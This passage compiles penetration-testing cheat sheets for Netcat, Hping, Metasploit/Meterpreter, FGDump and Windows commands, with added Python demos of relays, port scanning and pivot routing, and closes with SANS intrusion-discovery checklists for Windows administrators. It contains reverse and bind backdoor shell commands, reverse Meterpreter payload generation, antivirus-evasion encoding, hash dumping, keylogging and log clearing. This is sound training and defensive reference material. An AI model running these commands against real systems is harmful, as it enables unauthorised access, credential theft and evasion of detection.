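        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    threading.Thread(target=run, daemon=True).start()
    return port


def demo_listener_to_client():
    """Client -> relay -> echo service and back; returns what the client received."""
    relay_port = listener_to_client_relay(0, "127.0.0.1", start_echo_server())
    with socket.create_connection(("127.0.0.1", relay_port)) as c:
        c.sendall(b"ping through the relay\n")  # constructed message
        c.shutdown(socket.SHUT_WR)
        return _recv_all(c)


def demo_listener_to_listener():
    """Two clients connect to the two listening ports; what A sends arrives at B."""
    p1, p2 = listener_to_listener_relay()
    a = socket.create_connection(("127.0.0.1", p1))
    b = socket.create_connection(("127.0.0.1", p2))
    a.sendall(b"hello from A\n")  # constructed message
    a.shutdown(socket.SHUT_WR)
    got = _recv_all(b)
    b.close()
    a.close()
    return got


if __name__ == "__main__":
    print(demo_listener_to_client())
    print(demo_listener_to_listener())
```

The half-close in `_pump` is the detail that matters operationally: without it the relay hangs after the last byte, which is also why the nc version needs the FIFO rather than a plain `|` in each direction.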

File Transfer
Push a file from client to listener:
$ nc -l -p [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]

Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]

TCP Port Scanner
Port scan an IP Address:
$ nc -v -n -z -w1 [TargetIPaddr] [start_port]-[end_port]
Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)
The randomize ports (-r) switch can be used to choose port numbers randomly in the range

TCP Banner Grabber
Grab the banner of any TCP service running on an IP Address from Linux:
$ echo "" | nc -v -n -w1 [TargetIPaddr] [start_port]-[end_port]
Attempt to connect to each port in a range from [end_port] to [start_port] on IP Address [TargetIPaddr] running verbosely (-v), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response
Add -r to randomize destination ports within the range
Add -p [port] to specify a source port
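The connect scan (-z -w1) and the blank-line banner grab above, written as Python functions: an added example, not part of the cheat sheet. A full TCP connect with no payload is what -z does, the per-port timeout is -w1, and the optional shuffle is -r. It runs against two constructed local services (one that greets with an FTP-style banner, one that accepts and says nothing) plus one deliberately closed port, so the three outcomes a practitioner meets (open with banner, open but silent, refused) all show up; banner text and ports are made up for the demo.

```python
import random
import socket
import threading


def tcp_connect_scan(host, ports, timeout=1.0, randomize=False):
    """nc -v -n -z -w1 host start-end (plus -r): full TCP connect, no payload,
    give up after `timeout` seconds per port. Returns the open ports, sorted."""
    order = list(ports)
    if randomize:                  # -r: hit the ports in random order
        random.shuffle(order)
    open_ports = []
    for port in order:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)      # -w1
        try:
            s.connect((host, port))  # -z: connect only, send nothing
            open_ports.append(port)
        except OSError:            # refused, filtered (timeout) or unreachable
            pass
        finally:
            s.close()
    return sorted(open_ports)


def grab_banner(host, port, timeout=1.0, probe=b"\n"):
    """echo "" | nc -v -n -w1 host port: connect, send a blank line, return
    whatever the service says within `timeout` seconds (b"" if it stays quiet)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(probe)
            return s.recv(1024)
    except OSError:                # timeout, reset or refused
        return b""


def start_fake_service(banner):
    """Constructed local service for the demo: sends `banner` on connect
    (None = silent) and then drains input. Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            conn.settimeout(2.0)
            try:
                if banner:
                    conn.sendall(banner)
                while conn.recv(4096):
                    pass
            except OSError:        # the -z scanner closes without reading; that's fine
                pass
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def closed_port():
    """Reserve a port and release it so a connect to it is refused."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    ftp_port = start_fake_service(b"220 ftp.example.test FTP ready\r\n")  # constructed banner
    quiet_port = start_fake_service(None)
    dead_port = closed_port()
    found = tcp_connect_scan("127.0.0.1", [ftp_port, quiet_port, dead_port],
                             timeout=1.0, randomize=True)
    return {
        "ftp_open": ftp_port in found,
        "quiet_open": quiet_port in found,
        "dead_open": dead_port in found,
        "ftp_banner": grab_banner("127.0.0.1", ftp_port, timeout=1.0),
        # silent service: nothing arrives within the -w window, so the grab returns b""
        "quiet_banner": grab_banner("127.0.0.1", quiet_port, timeout=0.5),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Note the difference between the two probes: the scan never sends a byte, so a service that logs only payloads will not record it, while the banner grab does write a newline, which some services (HTTP, for one) answer with an error rather than a greeting.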

Backdoor Shells
Listening backdoor shell on Linux:
$ nc -l -p [LocalPort] -e /bin/bash
Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe
Create a shell on local port [LocalPort] that can then be accessed using a fundamental Netcat client

Reverse backdoor shell on Linux:
$ nc [YourIPaddr] [port] -e /bin/bash
Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [port] -e cmd.exe
Create a reverse shell that will attempt to connect to [YourIPaddr] on local port [port]. This shell can then be captured using a fundamental nc listener


Misc Tools Cheat Sheet
By Ed Skoudis
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
The purpose of this cheat sheet is to describe some common options for a variety of security assessment and pen test tools covered in SANS 504 and 560.

Tools Described on This Sheet
Metasploit 3.X: The Metasploit Framework is a development platform for developing and using security tools and exploits.
Metasploit Meterpreter: The Meterpreter is a payload within the Metasploit Framework which provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
Fgdump: FGDump is a tool for locally or remotely dumping runtime Windows password hashes.
Hping: Hping is a command-line TCP/IP packet assembler/analyzer.

Hping Usage:
# hping [Options] [TargetIPaddr]
Send packets to [TargetIPaddr] as specified by [Options]

Options:
--count [N]: Number of packets to send
--beep: Beep when a packet is received
--file [FileName]: Send contents of file as a payload, must be used with --data
--data [N]: Length of payload to send in bytes, if no --file is specified, payload is all X's
--interface [Interface]: Use specified interface name

Speed Options:
--fast: Ten packets per second
--faster: One million packets per second
--flood: Send packets as fast as possible
--interval [Seconds]/u[Microseconds]: Interval in seconds/microseconds between sent packets

Modes:
Default Mode: TCP
--rawip: Send raw IP packets, no TCP/UDP
--icmp: Send ICMP packets
--udp: Send UDP packets

Source Selection:
--spoof [Hostname]: Send all packets from specified source address

Hping (continued)

Target Address Selection:
Single Target:
# hping [TargetIPaddr]
Send packets to [TargetIPaddr]
Random Multiple Targets:
# hping --rand-dest 10.10.10.x --interface eth0
Send packets to 10.10.10.x with x being randomly chosen for each packet between 1 and 255. --interface must be used with --rand-dest

Dest Port Selection:
Single Port: --destport [Port]
[Port]: Send packets to this port
+[Port]: Increment port number by one for each response received
++[Port]: Increment port number by one for each packet sent
Multiple/Range of Ports:
--scan [PortRange/List]: Scan this target range or list of ports (x-y,z,known). The known keyword tells Hping to send packets to the list of ports in /etc/services

Source Port Selection:
Default: Use source port > 1024 assigned by OS, incrementing for each packet sent
--baseport [Port]: Start with this source port, incrementing for each packet sent
--keep: Use only a single source port for all packets


Metasploit Cheat Sheet
By Ed Skoudis and Yori Kvitchko
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
The purpose of this cheat sheet is to describe some common options for some of the various components of the Metasploit Framework.

Tools Described on This Sheet
Metasploit: The Metasploit Framework is a development platform for developing and using security tools and exploits.
Metasploit Meterpreter: The Meterpreter is a payload within the Metasploit Framework which provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.
Metasploit msfpayload: The msfpayload tool is a component of the Metasploit Framework which allows the user to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Perl script and raw shellcode.

Useful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route. Use proxychains configured for socks4 to route any application's traffic through a Meterpreter session.

msfpayload
The msfpayload tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files. Run by itself gives a list of payloads.
$ msfpayload [PayloadPath] LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort] [ExportType]

Example: Reverse Meterpreter payload as an executable and redirected into a file:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > met.exe

Export Types:
S - Print out a summary of the specified options
X - Executable
P - Perl
y - Ruby
R - Raw shellcode
C - C code

Encoding Payloads with msfencode
The msfencode tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l' gives a list of encoders.
$ msfencode -e [Encoder] -t [OutputType (exe, perl, ruby, raw, c)] -c [EncodeCount] -o [OutputFilename]

Example: Encode a payload from msfpayload 5 times using the shikata_ga_nai encoder and output as an executable:
$ msfpayload [...] R | msfencode -c 5 -e x86/shikata_ga_nai -t exe -o mal.exe

Meterpreter Post Modules
With an available Meterpreter session, post modules can be run on the target machine.
Post Modules from Meterpreter:
meterpreter > run post/multi/gather/env
Post Modules on a Backgrounded Session:
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run


FGDump Usage:
C:\> fgdump [Options] -h [TargetIPaddr] -u [Username] -p [Password]
Dump password hashes from [TargetIPaddr] with Admin credentials: [Username]/[Password]

Options:
-c: Skip cache dump
-w: Skip password dump
-s: Perform protected storage dump
-r: Ignore existing pw/cachedump files and don't skip hosts
-v: Verbose output
-l [FileName]: Keep logs in [FileName]

Examples:
Dump info from local machine using current user:
C:\> fgdump
Dump from a local machine using a different user:
C:\> fgdump -h 127.0.0.1 -u [Username]
Dump from a remote machine using a specified user:
C:\> fgdump -h [TargetIPaddr] -u [Username] -p [Password]
Dump from a remote machine without cachedump:
C:\> fgdump -h [TargetIPaddr] -u [Username] -c

Metasploit Console (msfconsole)
Search for module: msf > search [regex]
Specify an Exploit to use: msf > use exploit/[ExploitPath]
Specify a Payload to use: msf > set PAYLOAD [PayloadPath]
Show options for the current modules: msf > show options
Set Options: msf > set [Option] [Value]
Start Exploit: msf > exploit

Metasploit Meterpreter
Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory

File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory
ls: Show contents of a directory
cat: Display contents of a file on screen
download / upload: Move files to/from target machine
mkdir / rmdir: Make / Remove directory
edit: Open a file in an editor, default is vi

Process Commands:
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
- Target process must have same or lesser privileges
- Target process may be a more stable process
- When inside a process, can access any files that process has a lock on

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table

Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/Disable either the mouse or keyboard of the target machine
screenshot: Save as an image a screenshot of the target machine

Additional Modules:
use [module]: Load the specified module
Example:
use priv: Load the Priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps


Managing Sessions
Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j
List all current jobs (usually exploit listeners):
msf > jobs -l
Kill a job:
msf > jobs -k [JobID]

Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l
Interact with a backgrounded session:
msf > sessions -i [SessionID]
Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
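The pivot rule the sheet states in two places (traffic whose destination matches a route's subnet goes through that route's session, everything else leaves directly) modelled as a small routing table, including what happens when routes overlap: an added example, not part of the cheat sheet and not Metasploit's own code. The subnets and session numbers are constructed; the netmask-to-prefix conversion and longest-prefix selection are the parts worth seeing.

```python
import ipaddress


class PivotRoutes:
    """Model of `route add [Subnet] [Netmask] [SessionID]` and the lookup it implies."""

    def __init__(self):
        self.routes = []  # (ip_network, session_id)

    def add(self, subnet, netmask, session_id):
        """msf > route add 10.10.10.0 255.255.255.0 1"""
        # strict=False accepts a host address as the subnet field, as the console does
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        self.routes.append((net, int(session_id)))

    def delete(self, subnet, netmask, session_id):
        net = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        self.routes = [r for r in self.routes if r != (net, int(session_id))]

    def session_for(self, host):
        """Session a connection to `host` is pivoted through, or None when no route
        matches (the connection goes out directly from the attacker's box)."""
        addr = ipaddress.ip_address(host)
        matches = [(net, sid) for net, sid in self.routes if addr in net]
        if not matches:
            return None
        return max(matches, key=lambda m: m[0].prefixlen)[1]  # most specific route wins

    def __str__(self):
        """Roughly the shape of `route print`: subnet, netmask, session."""
        return "\n".join(f"{str(n.network_address):<15} {str(n.netmask):<15} Session {s}"
                         for n, s in self.routes)


def demo():
    table = PivotRoutes()
    table.add("10.10.10.0", "255.255.255.0", 1)      # constructed: session 1 sits in 10.10.10.0/24
    table.add("10.10.0.0", "255.255.0.0", 2)         # constructed: session 2 reaches the wider /16
    table.add("10.10.10.99", "255.255.255.255", 3)   # constructed: one host pinned to session 3
    return {
        "10.10.10.5": table.session_for("10.10.10.5"),    # /24 beats /16 -> session 1
        "10.10.20.5": table.session_for("10.10.20.5"),    # only the /16 matches -> session 2
        "10.10.10.99": table.session_for("10.10.10.99"),  # /32 host route -> session 3
        "192.168.1.7": table.session_for("192.168.1.7"),  # no route -> direct (None)
    }


if __name__ == "__main__":
    t = PivotRoutes()
    t.add("10.10.10.0", "255.255.255.0", 1)
    print(t)
    print(demo())
```

Combined with the socks4 server and proxychains from the previous sheet, the same lookup decides which Meterpreter session a proxied application connection is tunnelled through.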



Metasploit Cheat Sheet

Step 1: Core Commands

At its most basic use, meterpreter is a Linux terminal on the victim's computer. As such, many of our basic Linux commands can be used on the meterpreter even if it's on a Windows or other operating system.

Here are some of the core commands we can use on the meterpreter.

• ? - help menu

• background - moves the current session to the background

• bgkill - kills a background meterpreter script

• bglist - provides a list of all running background scripts

• bgrun - runs a script as a background thread

• channel - displays active channels

• close - closes a channel

• exit - terminates a meterpreter session

• help - help menu

• interact - interacts with a channel

• irb - go into Ruby scripting mode

• migrate - moves the active process to a designated PID

• quit - terminates the meterpreter session

• read - reads the data from a channel

• run - executes the meterpreter script designated after it

• use - loads a meterpreter extension

• write - writes data to a channel

Step 2: File System Commands

• cat - read and output to stdout the contents of a file

• cd - change directory on the victim

• del - delete a file on the victim

• download - download a file from the victim system to the attacker system

• edit - edit a file with vim

• getlwd - print the local directory

• getwd - print working directory

• lcd - change local directory

• lpwd - print local directory

• ls - list files in current directory

• mkdir - make a directory on the victim system

• pwd - print working directory

• rm - delete a file

• rmdir - remove directory on the victim system

• upload - upload a file from the attacker system to the victim

Step 3: Networking Commands

• ipconfig - displays network interfaces with key information including IP address, etc.

• portfwd - forwards a port on the victim system to a remote service

• route - view or modify the victim routing table

Step 4: System Commands

• clearev - clears the event logs on the victim's computer

• drop_token - drops a stolen token

• execute - executes a command

• getpid - gets the current process ID (PID)

• getprivs - gets as many privileges as possible

• getuid - get the user that the server is running as

• kill - terminate the process designated by the PID

• ps - list running processes

• reboot - reboots the victim computer

• reg - interact with the victim's registry

• rev2self - calls RevertToSelf() on the victim machine

• shell - opens a command shell on the victim machine

• shutdown - shuts down the victim's computer

• steal_token - attempts to steal the token of a specified (PID) process

• sysinfo - gets the details about the victim computer such as OS and name

Step 5: User Interface Commands

• enumdesktops - lists all accessible desktops

• getdesktop - get the current meterpreter desktop

• idletime - checks to see how long since the victim system has been idle

• keyscan_dump - dumps the contents of the software keylogger

• keyscan_start - starts the software keylogger when associated with a process such as Word or a browser

• keyscan_stop - stops the software keylogger

• screenshot - grabs a screenshot of the meterpreter desktop

• set_desktop - changes the meterpreter desktop

• uictl - enables control of some of the user interface components

Step 6: Privilege Escalation Commands

• getsystem - uses 15 built-in methods to gain sysadmin privileges

Step 7: Password Dump Commands

• hashdump - grabs the hashes in the password (SAM) file

Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.

Step 8: Timestomp Commands

• timestomp - manipulates the modify, access, and create attributes of a file

Windows Command Line Cheat Sheet
By Ed Skoudis
POCKET REFERENCE GUIDE
http://www.sans.org

Purpose
The purpose of this cheat sheet is to provide tips on how to use various Windows commands that are frequently referenced in SANS 504, 517, 531, and 560.

WMIC
Fundamental grammar:
C:\> wmic [alias] [where clause] [verb clause]

Useful [aliases]:
process
share
startup
service
nicconfig
useraccount
qfe (Quick Fix Engineering - shows patches)

Example [where clauses]:
where name="nc.exe"
where (commandline like "%stuff")
where (name="cmd.exe" and parentprocessid!="[pid]")

Example [verb clauses]:
list [full|brief]
get [attrib1,attrib2…]
call [method]
delete

List all attributes of [alias]:
C:\> wmic [alias] get /?
List all callable methods of [alias]:
C:\> wmic [alias] call /?
Example: List all attributes of all running processes:
C:\> wmic process list full
Make WMIC affect remote [TargetIPaddr]:
C:\> wmic /node:[TargetIPaddr] /user:[User] /password:[Passwd] process list full

Reg Command
Adding Keys and Values:
C:\> reg add [\\TargetIPaddr\][RegDomain]\[Key]
Add a key to the registry on machine [TargetIPaddr] within the registry domain [RegDomain] to location [Key]. If no remote machine is specified, the current machine is assumed.

Export and Import:
C:\> reg export [RegDomain]\[Key] [FileName]
Export all subkeys and values located in the domain [RegDomain] under the location [Key] to the file [FileName]
C:\> reg import [FileName]
Import all registry entries from the file [FileName]
Import and export can only be done from or to the local machine.

Query for a specific Value of a Key:
C:\> reg query [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName]
Query a key on machine [TargetIPaddr] within the registry domain [RegDomain] in location [Key] and get the specific value [ValueName] under that key. Add /s to recurse all values.

Process and Service Information
List all processes currently running:
C:\> tasklist
List all processes currently running and the DLLs each has loaded:
C:\> tasklist /m
List all processes currently running which have the specified [dll] loaded:
C:\> tasklist /m [dll]
List all processes currently running and the services hosted in those processes:
C:\> tasklist /svc
Query brief status of all services:
C:\> sc query
Query the configuration of a specific service:
C:\> sc qc [ServiceName]

54 62

File Search and Counting Lines
Search directory structure for a file in a specific directory:
C:\> dir /b /s [Directory]\[FileName]
Count the number of lines on Standard Out of [Command]:
C:\> [Command] | find /c /v ""
Finds the count (/c) of lines that do not contain (/v) nothing (""). Lines that do not have nothing are all lines, even blank lines, which contain CR/LF.

Invoking Useful GUIs at the Command Line
Local User Manager (includes group management):
C:\> lusrmgr.msc
Services Control Panel:
C:\> services.msc
Task Manager:
C:\> taskmgr.exe
Security Policy Manager:
C:\> secpol.msc
Event Viewer:
C:\> eventvwr.msc
Control Panel:
C:\> control
Close GUI windows by hitting Alt-F4

Command Line FOR Loops
Counting Loop:
C:\> for /L %i in ([start],[step],[stop]) do [command]
Set %i to an initial value of [start] and increment it by [step] at every iteration until its value is equal to [stop]. For each iteration, run [command]. The iterator variable %i can be used anywhere in the command to represent its current value.
Iterate over file contents:
C:\> for /F %i in ([file-set]) do [command]
Iterate through the contents of the file on a line-by-line basis. For each iteration, store the contents of the line into %i and run [command].

Shutdown and Restart
Shutdown Windows immediately:
C:\> shutdown /s /t 0
Note: Command may not power down the hardware.
Restart Windows immediately:
C:\> shutdown /r /t 0
Abort shutdown/restart countdown:
C:\> shutdown /a

Interacting with the Network Using Netsh
Turn off built-in Windows firewall:
C:\> netsh firewall set opmode disable
Configure interface "Local Area Connection" with [IPaddr] [Netmask] [DefaultGW]:
C:\> netsh interface ip set address local static [IPaddr] [Netmask] [DefaultGW] 1
Configure DNS server for "Local Area Connection":
C:\> netsh interface ip set dns local static [IPaddr]
Configure interface to use DHCP:
C:\> netsh interface ip set address local dhcp

Useful Netstat Syntax
Show all TCP and UDP port usage and process ID:
C:\> netstat -nao
Look for usage of port [port] every [N] seconds:
C:\> netstat -nao [N] | find [port]
Dump detailed protocol statistics:
C:\> netstat -s -p [tcp|udp|ip|icmp]

Installing Built-in Packages on Vista
Install telnet service on Vista:
C:\> pkgmgr /iu:"TelnetServer"
Install telnet client on Vista:
C:\> pkgmgr /iu:"TelnetClient"
Install IIS on Vista:
C:\> pkgmgr /iu:IIS-WebServerRole;WAS-WindowsActivationService;WAS-ProcessModel;WAS-NetFxEnvironment;WAS-ConfigurationAPI
To remove any of these packages, replace install update (/iu) with uninstall update (/uu).

Intrusion Discovery Cheat Sheet v2.0
Windows 2000
POCKET REFERENCE GUIDE
SANS Institute
http://www.sans.org
http://isc.sans.org
Download the latest version of this sheet from http://www.sans.org/resources/win2ksacheatsheet.pdf

Purpose
System Administrators are often on the front lines of computer security. This guide aims to support System Administrators in finding indications of a system compromise.

How To Use This Sheet
On a periodic basis (daily, weekly, or each time you logon to a system you manage), run through these quick steps to look for anomalous behavior that might be caused by a computer intrusion. Each of these commands runs locally on a system.
This sheet is split into these sections:
• Unusual Processes and Services
• Unusual Files and Reg Keys
• Unusual Network Usage
• Unusual Scheduled Tasks
• Unusual Accounts
• Unusual Log Entries
• Other Unusual Items
• Additional Supporting Tools

If you spot anomalous behavior: DO NOT PANIC! Your system may or may not have come under attack. Please contact the Incident Handling Team immediately to report the activities and get further assistance.

Unusual Log Entries
To look at logs, run the Windows event viewer:
C:\> eventvwr.msc
Or, invoke the event viewer by going to: Start → Programs → Administrative Tools → Event Viewer
Look for suspicious events, such as:
"Event log service was stopped."
"Windows File Protection is not active on this system."
"The protected System file [file name] was not restored to its original, valid version because the Windows File Protection..."
"The MS Telnet Service has started successfully."
Look for large number of failed logon attempts or locked out accounts.

Other Unusual Items
Look for unusually sluggish performance and a single unusual process hogging the CPU: Task Manager → Process and Performance tabs
Look for unusual system crashes, beyond the normal level for the given system.

Additional Supporting Tools
The following tools are not built into the Windows operating system, but can be used to analyze its security status in more detail. Each is available for free download at the listed web site.
DISCLAIMER: The SANS Institute is not responsible for creating, distributing, warranting, or supporting any of the following tools.
Tools for mapping listening TCP/UDP ports to the program listening on those ports:
Fport – command-line tool at www.foundstone.com
TCPView – GUI tool at www.microsoft.com/technet/sysinternals
Process analysis tools from the Windows 2000 Resource Kit -- http://support.microsoft.com/kb/927229:
pulist – shows user name associated with each running process
pstat – shows detailed process statistics, including name, Pid, memory, etc.
Additional Process Analysis Tools:
Process Explorer – GUI tool at www.microsoft.com/technet/sysinternals
TaskMan+ -- GUI tool at http://www.diamondcs.com.au
The Center for Internet Security has released various Windows security templates and security scoring tools for free at www.cisecurity.org.

Unusual Processes and Services
Look for unusual/unexpected processes by running Task Manager: (Start → Run… and type taskmgr.exe)
Look for unusual network services installed:
C:\> net start
Look for unusual started network services (GUI):
C:\> services.msc
You need to be familiar with the normal processes on the machine and search for deviations from the norm.

Unusual Files and Registry Keys
Check file space usage to look for sudden major decreases in free space, using the GUI (right-click on partition), or type:
C:\> dir c:\
Look for unusually big files: Start → Search → For Files or Folders… → Search Options → Size → At Least 10000KB
Look for strange programs referred to in registry keys associated with system start up:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunonceEx
To check the registry, run:
C:\> regedit.exe

Unusual Network Usage
Look at file shares, and make sure each has a defined business purpose:
C:\> net view \\127.0.0.1
Look at who has an open session with the machine:
C:\> net session
Look at which sessions this machine has opened with other systems:
C:\> net use
Look at NetBIOS over TCP/IP activity:
C:\> nbtstat -S
Look for unusual listening TCP and UDP ports:
C:\> netstat -na
For continuously updated and scrolling output of this command every 5 seconds:
C:\> netstat -na 5
Windows XP and 2003 include the -o flag for showing owning process id:
C:\> netstat -nao 5
Again, you need to understand normal port usage for the system and look for deviations.

Unusual Scheduled Tasks
Look at scheduled tasks on the local host by running:
C:\> at
Also, check the scheduled tasks using the Task Manager, invoked by going to: Start → Programs → Accessories → System Tools → Scheduled Tasks
Look for unusual scheduled tasks, especially those that run as a user in the Administrator's group, as SYSTEM, or with a blank user name.
Look for unexpected entries in user autostart directories:
C:\Documents and Settings\[user_name]\Start Menu\Programs\StartUp
C:\Winnt\Profiles\[user_name]\Start Menu\Programs\StartUp

Unusual Accounts
Look for new, unexpected accounts in the Administrators group:
C:\> lusrmgr.msc
Click on Groups, Double Click on Administrators, then check members of this group.
This can also be done at the command prompt:
C:\> net user
C:\> net localgroup administrators

Intrusion Discovery Cheat Sheet v2.0
Windows XP Pro / 2003 Server / Vista
POCKET REFERENCE GUIDE
SANS Institute
www.sans.org and isc.sans.org
Download the latest version of this sheet from http://www.sans.org/resources/winsacheatsheet.pdf

Purpose
System Administrators are often on the front lines of computer security. This guide aims to support System Administrators in finding indications of a system compromise.

How To Use This Sheet
On a periodic basis (daily, weekly, or each time you logon to a system you manage), run through these quick steps to look for anomalous behavior that might be caused by a computer intrusion. Each of these commands runs locally on a system.
This sheet is split into these sections:
• Unusual Processes and Services
• Unusual Files and Reg Keys
• Unusual Network Usage
• Unusual Scheduled Tasks
• Unusual Accounts
• Unusual Log Entries
• Other Unusual Items
• Additional Supporting Tools

If you spot anomalous behavior: DO NOT PANIC! Your system may or may not have come under attack. Please contact the Incident Handling Team immediately to report the activities and get further assistance.

Unusual Log Entries
Check your logs for suspicious events, such as:
"Event log service was stopped."
"Windows File Protection is not active on this system."
"The protected System file [file name] was not restored to its original, valid version because the Windows File Protection..."
"The MS Telnet Service has started successfully."
Look for large number of failed logon attempts or locked out accounts. To do this using the GUI, run the Windows event viewer:
C:\> eventvwr.msc
Using the command prompt:
C:\> eventquery.vbs | more
Or, to focus on a particular event log:
C:\> eventquery.vbs /L security

Other Unusual Items
Look for unusually sluggish performance and a single unusual process hogging the CPU: Task Manager → Process and Performance tabs
Look for unusual system crashes, beyond the normal level for the given system.

Additional Supporting Tools
The following tools are not built into the Windows operating system but can be used to analyze security issues in more detail. Each is available for free download at the listed web site.
DISCLAIMER: The SANS Institute is not responsible for creating, distributing, warranting, or supporting any of the following tools.
Tools for mapping listening TCP/UDP ports to the program listening on those ports:
Fport – command-line tool at www.foundstone.com
TCPView – GUI tool at www.microsoft.com/technet/sysinternals
Additional Process Analysis Tools:
Process Explorer – GUI tool at www.microsoft.com/technet/sysinternals
TaskMan+ -- GUI tool at http://www.diamondcs.com.au
The Center for Internet Security has released various Windows security templates and security scoring tools for free at www.cisecurity.org.

Unusual Processes and Services
Look for unusual/unexpected processes, and focus on processes with User Name "SYSTEM" or "Administrator" (or users in the Administrators' group). You need to be familiar with normal processes and services and search for deviations.
Using the GUI, run Task Manager:
C:\> taskmgr.exe
Using the command prompt:
C:\> tasklist
C:\> wmic process list full
Also look for unusual services.
Using the GUI:
C:\> services.msc
Using the command prompt:
C:\> net start
C:\> sc query
For a list of services associated with each process:
C:\> tasklist /svc

Unusual Files and Registry Keys
Check file space usage to look for sudden major decreases in free space, using the GUI (right-click on partition), or type:
C:\> dir c:\
Look for unusually big files: Start → Search → For Files or Folders → Search Options → Size → At Least 10000KB
Look for strange programs referred to in registry keys associated with system start up:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunonceEx
Note that you should also check the HKCU counterparts (replace HKLM with HKCU above).
Using the GUI:
C:\> regedit
Using the command prompt:
C:\> reg query <reg key>

Unusual Network Usage
Look at file shares, and make sure each has a defined business purpose:
C:\> net view \\127.0.0.1
Look at who has an open session with the machine:
C:\> net session
Look at which sessions this machine has opened with other systems:
C:\> net use
Look at NetBIOS over TCP/IP activity:
C:\> nbtstat -S
Look for unusual listening TCP and UDP ports:
C:\> netstat -na
For continuously updated and scrolling output of this command every 5 seconds:
C:\> netstat -na 5
The -o flag shows the owning process id:
C:\> netstat -nao 5
The -b flag shows the executable name and the DLLs loaded for the network connection:
C:\> netstat -naob 5
Note that the -b flag uses excessive CPU resources.
Again, you need to understand normal port usage for the system and look for deviations.
Also check Windows Firewall configuration:
C:\> netsh firewall show config

Unusual Scheduled Tasks
Look for unusual scheduled tasks, especially those that run as a user in the Administrators group, as SYSTEM, or with a blank user name.
Using the GUI, run Task Scheduler: Start → Programs → Accessories → System Tools → Scheduled Tasks
Using the command prompt:
C:\> schtasks
Check other autostart items as well for unexpected entries, remembering to check user autostart directories and registry keys.
Using the GUI, run msconfig and look at the Startup tab: Start → Run, msconfig.exe
Using the command prompt:
C:\> wmic startup list full

Unusual Accounts
Look for new, unexpected accounts in the Administrators group:
C:\> lusrmgr.msc
Click on Groups, Double Click on Administrators, then check members of this group.
This can also be done at the command prompt:
C:\> net user
C:\> net localgroup administrators
